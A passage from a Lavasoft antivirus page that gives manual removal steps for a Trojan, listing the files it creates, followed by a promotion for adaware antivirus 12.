    6d4509907f6984392fadff64d29afe6.exe:1744

  3. Delete the original Trojan file.
  4. Delete or disinfect the following files created/modified by the Trojan:

    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ioyIAh\6d4509907f6984392fadff64d29afe6.exe (7962 bytes)
    C:\Windows\kDLxTQ.dll (11 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries (600 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk (2 bytes)
    C:\Windows\FuYQjy\WPHvFGSUV.tmp (12 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    C:\Users\Public\Desktop\Google Chrome.lnk (2 bytes)
    C:\Windows\CLOG.txt (87 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk (2 bytes)
    C:\Windows\FuYQjy\NRYLflMJ.dll (264 bytes)
    C:\Windows\OMTjoPCF.dll (13 bytes)
    C:\Users\Public\Desktop\Mozilla Firefox.lnk (1 bytes)
    C:\Windows\FuYQjy\4BFD7.dat (161 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (1 bytes)
    C:\Users\"%CurrentUserName%"\Favorites\Links\Web Slice Gallery.url (290 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.ini (67 bytes)
    C:\Windows\System32\2036c9\CDClient_EX.sys (117 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing (12 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache (4 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk (1 bytes)
    C:\Windows\FuYQjy\gbilEk.dll (15753 bytes)
    C:\Windows\3.txt (1480 bytes)

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2025 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now